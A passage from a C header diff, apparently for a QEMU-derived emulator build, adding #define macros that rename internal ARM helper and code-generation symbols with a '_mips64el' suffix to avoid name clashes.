gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_mips64el +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_mips64el +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_mips64el +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_mips64el +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_mips64el +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_mips64el +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_mips64el +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_mips64el +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_mips64el +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_mips64el +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_mips64el +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_mips64el +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_mips64el +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_mips64el +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_mips64el +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_mips64el +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_mips64el +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_mips64el +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_mips64el +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_mips64el +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_mips64el +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_mips64el +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_mips64el +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_mips64el +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_mips64el +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_mips64el +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_mips64el +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_mips64el +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_mips64el +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_mips64el +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_mips64el +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_mips64el +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_mips64el +#define gen_helper_neon_tbl gen_helper_neon_tbl_mips64el +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_mips64el +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_mips64el +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_mips64el +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_mips64el +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_mips64el +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_mips64el +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_mips64el +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_mips64el +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_mips64el +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_mips64el +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_mips64el +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_mips64el +#define gen_helper_neon_zip16 gen_helper_neon_zip16_mips64el +#define gen_helper_neon_zip8 gen_helper_neon_zip8_mips64el +#define gen_helper_pre_hvc gen_helper_pre_hvc_mips64el +#define gen_helper_pre_smc gen_helper_pre_smc_mips64el +#define gen_helper_qadd16 gen_helper_qadd16_mips64el +#define gen_helper_qadd8 gen_helper_qadd8_mips64el +#define gen_helper_qaddsubx gen_helper_qaddsubx_mips64el +#define gen_helper_qsub16 gen_helper_qsub16_mips64el +#define gen_helper_qsub8 gen_helper_qsub8_mips64el +#define gen_helper_qsubaddx gen_helper_qsubaddx_mips64el +#define gen_helper_rbit gen_helper_rbit_mips64el +#define gen_helper_recpe_f32 gen_helper_recpe_f32_mips64el +#define gen_helper_recpe_u32 gen_helper_recpe_u32_mips64el +#define gen_helper_recps_f32 gen_helper_recps_f32_mips64el +#define gen_helper_rintd gen_helper_rintd_mips64el +#define gen_helper_rintd_exact gen_helper_rintd_exact_mips64el +#define gen_helper_rints gen_helper_rints_mips64el +#define gen_helper_rints_exact gen_helper_rints_exact_mips64el +#define gen_helper_ror_cc gen_helper_ror_cc_mips64el +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_mips64el +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_mips64el +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_mips64el +#define gen_helper_sadd16 gen_helper_sadd16_mips64el +#define gen_helper_sadd8 gen_helper_sadd8_mips64el +#define gen_helper_saddsubx gen_helper_saddsubx_mips64el +#define gen_helper_sar_cc gen_helper_sar_cc_mips64el +#define gen_helper_sdiv gen_helper_sdiv_mips64el +#define gen_helper_sel_flags gen_helper_sel_flags_mips64el +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_mips64el +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_mips64el +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_mips64el +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_mips64el +#define gen_helper_set_rmode gen_helper_set_rmode_mips64el +#define gen_helper_set_user_reg gen_helper_set_user_reg_mips64el +#define gen_helper_shadd16 gen_helper_shadd16_mips64el +#define gen_helper_shadd8 gen_helper_shadd8_mips64el +#define gen_helper_shaddsubx gen_helper_shaddsubx_mips64el +#define gen_helper_shl_cc gen_helper_shl_cc_mips64el +#define gen_helper_shr_cc gen_helper_shr_cc_mips64el +#define gen_helper_shsub16 gen_helper_shsub16_mips64el +#define gen_helper_shsub8 gen_helper_shsub8_mips64el +#define gen_helper_shsubaddx gen_helper_shsubaddx_mips64el +#define gen_helper_ssat gen_helper_ssat_mips64el +#define gen_helper_ssat16 gen_helper_ssat16_mips64el +#define gen_helper_ssub16 gen_helper_ssub16_mips64el +#define gen_helper_ssub8 gen_helper_ssub8_mips64el +#define gen_helper_ssubaddx gen_helper_ssubaddx_mips64el +#define gen_helper_sub_saturate gen_helper_sub_saturate_mips64el +#define gen_helper_sxtb16 gen_helper_sxtb16_mips64el +#define gen_helper_uadd16 gen_helper_uadd16_mips64el +#define gen_helper_uadd8 gen_helper_uadd8_mips64el +#define gen_helper_uaddsubx gen_helper_uaddsubx_mips64el +#define gen_helper_udiv gen_helper_udiv_mips64el +#define gen_helper_uhadd16 gen_helper_uhadd16_mips64el +#define gen_helper_uhadd8 gen_helper_uhadd8_mips64el +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_mips64el +#define gen_helper_uhsub16 gen_helper_uhsub16_mips64el +#define gen_helper_uhsub8 gen_helper_uhsub8_mips64el +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_mips64el +#define gen_helper_uqadd16 gen_helper_uqadd16_mips64el +#define gen_helper_uqadd8 gen_helper_uqadd8_mips64el +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_mips64el +#define gen_helper_uqsub16 gen_helper_uqsub16_mips64el +#define gen_helper_uqsub8 gen_helper_uqsub8_mips64el +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_mips64el +#define gen_helper_usad8 gen_helper_usad8_mips64el +#define gen_helper_usat gen_helper_usat_mips64el +#define gen_helper_usat16 gen_helper_usat16_mips64el +#define gen_helper_usub16 gen_helper_usub16_mips64el +#define gen_helper_usub8 gen_helper_usub8_mips64el +#define gen_helper_usubaddx gen_helper_usubaddx_mips64el +#define gen_helper_uxtb16 gen_helper_uxtb16_mips64el +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_mips64el +#define gen_helper_v7m_msr gen_helper_v7m_msr_mips64el +#define gen_helper_vfp_absd gen_helper_vfp_absd_mips64el +#define gen_helper_vfp_abss gen_helper_vfp_abss_mips64el +#define gen_helper_vfp_addd gen_helper_vfp_addd_mips64el +#define gen_helper_vfp_adds gen_helper_vfp_adds_mips64el +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_mips64el +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_mips64el +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_mips64el +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_mips64el +#define gen_helper_vfp_divd gen_helper_vfp_divd_mips64el +#define gen_helper_vfp_divs gen_helper_vfp_divs_mips64el +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_mips64el +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_mips64el +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_mips64el +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_mips64el +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_mips64el +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_mips64el +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips64el +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_mips64el +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_mips64el +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_mips64el +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_mips64el +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_mips64el +#define gen_helper_vfp_mins gen_helper_vfp_mins_mips64el +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_mips64el +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_mips64el +#define gen_helper_vfp_muld gen_helper_vfp_muld_mips64el +#define gen_helper_vfp_muls gen_helper_vfp_muls_mips64el +#define gen_helper_vfp_negd gen_helper_vfp_negd_mips64el +#define gen_helper_vfp_negs gen_helper_vfp_negs_mips64el +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips64el +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_mips64el +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_mips64el +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_mips64el +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_mips64el +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_mips64el +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_mips64el +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_mips64el +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_mips64el +#define gen_helper_vfp_subd gen_helper_vfp_subd_mips64el +#define gen_helper_vfp_subs gen_helper_vfp_subs_mips64el +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_mips64el +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_mips64el +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_mips64el +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_mips64el +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_mips64el +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_mips64el +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_mips64el +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_mips64el +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_mips64el +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_mips64el +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_mips64el +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_mips64el +#define gen_helper_vfp_touid gen_helper_vfp_touid_mips64el +#define gen_helper_vfp_touis gen_helper_vfp_touis_mips64el +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_mips64el +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_mips64el +#define gen_helper_vfp_tould gen_helper_vfp_tould_mips64el +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_mips64el +#define gen_helper_vfp_touls gen_helper_vfp_touls_mips64el +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_mips64el +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_mips64el +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_mips64el +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_mips64el +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_mips64el +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_mips64el +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_mips64el +#define gen_helper_wfe gen_helper_wfe_mips64el +#define gen_helper_wfi gen_helper_wfi_mips64el +#define gen_hvc gen_hvc_mips64el +#define gen_intermediate_code_internal gen_intermediate_code_internal_mips64el +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_mips64el +#define gen_iwmmxt_address gen_iwmmxt_address_mips64el +#define gen_iwmmxt_shift gen_iwmmxt_shift_mips64el +#define gen_jmp gen_jmp_mips64el +#define gen_load_and_replicate gen_load_and_replicate_mips64el +#define gen_load_exclusive gen_load_exclusive_mips64el +#define gen_logic_CC gen_logic_CC_mips64el +#define gen_logicq_cc gen_logicq_cc_mips64el +#define gen_lookup_tb gen_lookup_tb_mips64el +#define gen_mov_F0_vreg gen_mov_F0_vreg_mips64el +#define gen_mov_F1_vreg gen_mov_F1_vreg_mips64el +#define gen_mov_vreg_F0 gen_mov_vreg_F0_mips64el +#define gen_muls_i64_i32 gen_muls_i64_i32_mips64el +#define gen_mulu_i64_i32 gen_mulu_i64_i32_mips64el +#define gen_mulxy gen_mulxy_mips64el +#define gen_neon_add gen_neon_add_mips64el +#define gen_neon_addl gen_neon_addl_mips64el +#define gen_neon_addl_saturate gen_neon_addl_saturate_mips64el +#define gen_neon_bsl gen_neon_bsl_mips64el +#define gen_neon_dup_high16 gen_neon_dup_high16_mips64el +#define gen_neon_dup_low16 gen_neon_dup_low16_mips64el +#define gen_neon_dup_u8 gen_neon_dup_u8_mips64el +#define gen_neon_mull gen_neon_mull_mips64el +#define gen_neon_narrow gen_neon_narrow_mips64el +#define gen_neon_narrow_op gen_neon_narrow_op_mips64el +#define gen_neon_narrow_sats gen_neon_narrow_sats_mips64el +#define gen_neon_narrow_satu gen_neon_narrow_satu_mips64el +#define gen_neon_negl gen_neon_negl_mips64el +#define gen_neon_rsb gen_neon_rsb_mips64el +#define gen_neon_shift_narrow gen_neon_shift_narrow_mips64el +#define gen_neon_subl gen_neon_subl_mips64el +#define gen_neon_trn_u16 gen_neon_trn_u16_mips64el +#define gen_neon_trn_u8 gen_neon_trn_u8_mips64el +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_mips64el +#define gen_neon_unzip gen_neon_unzip_mips64el +#define gen_neon_widen gen_neon_widen_mips64el +#define gen_neon_zip gen_neon_zip_mips64el +#define gen_new_label gen_new_label_mips64el +#define gen_nop_hint gen_nop_hint_mips64el +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_mips64el +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_mips64el +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_mips64el +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_mips64el +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_mips64el +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_mips64el +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_mips64el +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_mips64el +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_mips64el +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_mips64el +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_mips64el +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_mips64el +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_mips64el +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_mips64el +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_mips64el +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_mips64el +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_mips64el +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_mips64el +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_mips64el +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_mips64el +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_mips64el +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_mips64el +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_mips64el +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_mips64el +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_mips64el +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_mips64el +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_mips64el +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_mips64el +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_mips64el +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_mips64el +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_mips64el +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_mips64el +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_mips64el +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_mips64el +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_mips64el +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_mips64el +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_mips64el +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_mips64el +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_mips64el +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_mips64el +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_mips64el +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_mips64el +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_mips64el +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_mips64el +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_mips64el +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_mips64el +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_mips64el +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_mips64el +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_mips64el +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_mips64el +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_mips64el +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_mips64el +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_mips64el +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_mips64el +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_mips64el +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_mips64el +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_mips64el +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_mips64el +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_mips64el +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_mips64el +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_mips64el +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_mips64el +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_mips64el +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_mips64el +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_mips64el +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_mips64el +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_mips64el +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_mips64el +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_mips64el +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_mips64el +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_mips64el +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_mips64el +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_mips64el +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_mips64el +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_mips64el +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_mips64el +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_mips64el +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_mips64el +#define gen_rev16 gen_rev16_mips64el +#define gen_revsh gen_revsh_mips64el +#define gen_rfe gen_rfe_mips64el +#define gen_sar gen_sar_mips64el +#define gen_sbc_CC gen_sbc_CC_mips64el +#define gen_sbfx gen_sbfx_mips64el +#define gen_set_CF_bit31 gen_set_CF_bit31_mips64el +#define gen_set_condexec gen_set_condexec_mips64el +#define gen_set_cpsr gen_set_cpsr_mips64el +#define gen_set_label gen_set_label_mips64el +#define gen_set_pc_im gen_set_pc_im_mips64el +#define gen_set_psr gen_set_psr_mips64el +#define gen_set_psr_im gen_set_psr_im_mips64el +#define gen_shl gen_shl_mips64el +#define gen_shr gen_shr_mips64el +#define gen_smc gen_smc_mips64el +#define gen_smul_dual gen_smul_dual_mips64el +#define gen_srs gen_srs_mips64el +#define gen_ss_advance gen_ss_advance_mips64el +#define gen_step_complete_exception gen_step_complete_exception_mips64el +#define gen_store_exclusive gen_store_exclusive_mips64el +#define gen_storeq_reg gen_storeq_reg_mips64el +#define gen_sub_carry gen_sub_carry_mips64el +#define gen_sub_CC gen_sub_CC_mips64el +#define gen_subq_msw gen_subq_msw_mips64el +#define gen_swap_half gen_swap_half_mips64el +#define gen_thumb2_data_op gen_thumb2_data_op_mips64el +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_mips64el +#define gen_ubfx gen_ubfx_mips64el +#define gen_vfp_abs gen_vfp_abs_mips64el +#define gen_vfp_add gen_vfp_add_mips64el +#define gen_vfp_cmp gen_vfp_cmp_mips64el +#define gen_vfp_cmpe gen_vfp_cmpe_mips64el +#define gen_vfp_div gen_vfp_div_mips64el +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_mips64el +#define gen_vfp_F1_mul gen_vfp_F1_mul_mips64el +#define gen_vfp_F1_neg gen_vfp_F1_neg_mips64el +#define gen_vfp_ld gen_vfp_ld_mips64el +#define gen_vfp_mrs gen_vfp_mrs_mips64el +#define gen_vfp_msr gen_vfp_msr_mips64el +#define gen_vfp_mul gen_vfp_mul_mips64el +#define gen_vfp_neg gen_vfp_neg_mips64el +#define gen_vfp_shto gen_vfp_shto_mips64el +#define gen_vfp_sito gen_vfp_sito_mips64el +#define gen_vfp_slto gen_vfp_slto_mips64el +#define gen_vfp_sqrt gen_vfp_sqrt_mips64el +#define gen_vfp_st gen_vfp_st_mips64el +#define gen_vfp_sub gen_vfp_sub_mips64el +#define gen_vfp_tosh gen_vfp_tosh_mips64el +#define gen_vfp_tosi gen_vfp_tosi_mips64el +#define gen_vfp_tosiz gen_vfp_tosiz_mips64el +#define gen_vfp_tosl gen_vfp_tosl_mips64el +#define gen_vfp_touh gen_vfp_touh_mips64el +#define gen_vfp_toui gen_vfp_toui_mips64el +#define gen_vfp_touiz gen_vfp_touiz_mips64el +#define gen_vfp_toul gen_vfp_toul_mips64el +#define gen_vfp_uhto gen_vfp_uhto_mips64el +#define gen_vfp_uito gen_vfp_uito_mips64el +#define gen_vfp_ulto gen_vfp_ulto_mips64el +#define get_arm_cp_reginfo get_arm_cp_reginfo_mips64el +#define get_clock get_clock_mips64el +#define get_clock_realtime get_clock_realtime_mips64el +#define get_constraint_priority get_constraint_priority_mips64el +#define get_float_exception_flags get_float_exception_flags_mips64el +#define get_float_rounding_mode get_float_rounding_mode_mips64el +#define get_fpstatus_ptr get_fpstatus_ptr_mips64el +#define get_level1_table_address get_level1_table_address_mips64el +#define get_mem_index get_mem_index_mips64el +#define get_next_param_value get_next_param_value_mips64el +#define get_opt_name get_opt_name_mips64el +#define get_opt_value get_opt_value_mips64el +#define get_page_addr_code get_page_addr_code_mips64el +#define get_param_value get_param_value_mips64el +#define get_phys_addr get_phys_addr_mips64el +#define get_phys_addr_lpae get_phys_addr_lpae_mips64el +#define get_phys_addr_mpu get_phys_addr_mpu_mips64el +#define get_phys_addr_v5 get_phys_addr_v5_mips64el +#define get_phys_addr_v6 get_phys_addr_v6_mips64el +#define get_system_memory get_system_memory_mips64el +#define get_ticks_per_sec get_ticks_per_sec_mips64el +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_mips64el +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__mips64el +#define gt_cntfrq_access gt_cntfrq_access_mips64el +#define gt_cnt_read gt_cnt_read_mips64el +#define gt_cnt_reset gt_cnt_reset_mips64el +#define gt_counter_access gt_counter_access_mips64el +#define gt_ctl_write gt_ctl_write_mips64el +#define gt_cval_write gt_cval_write_mips64el +#define gt_get_countervalue gt_get_countervalue_mips64el +#define gt_pct_access gt_pct_access_mips64el +#define gt_ptimer_access gt_ptimer_access_mips64el +#define gt_recalc_timer gt_recalc_timer_mips64el +#define gt_timer_access gt_timer_access_mips64el +#define gt_tval_read gt_tval_read_mips64el +#define gt_tval_write gt_tval_write_mips64el +#define gt_vct_access gt_vct_access_mips64el +#define gt_vtimer_access gt_vtimer_access_mips64el +#define guest_phys_blocks_free guest_phys_blocks_free_mips64el +#define guest_phys_blocks_init guest_phys_blocks_init_mips64el +#define handle_vcvt handle_vcvt_mips64el +#define handle_vminmaxnm handle_vminmaxnm_mips64el +#define handle_vrint handle_vrint_mips64el +#define handle_vsel handle_vsel_mips64el +#define has_help_option has_help_option_mips64el +#define have_bmi1 have_bmi1_mips64el +#define have_bmi2 have_bmi2_mips64el +#define hcr_write hcr_write_mips64el +#define helper_access_check_cp_reg helper_access_check_cp_reg_mips64el +#define helper_add_saturate helper_add_saturate_mips64el +#define helper_add_setq helper_add_setq_mips64el +#define helper_add_usaturate helper_add_usaturate_mips64el +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_mips64el +#define 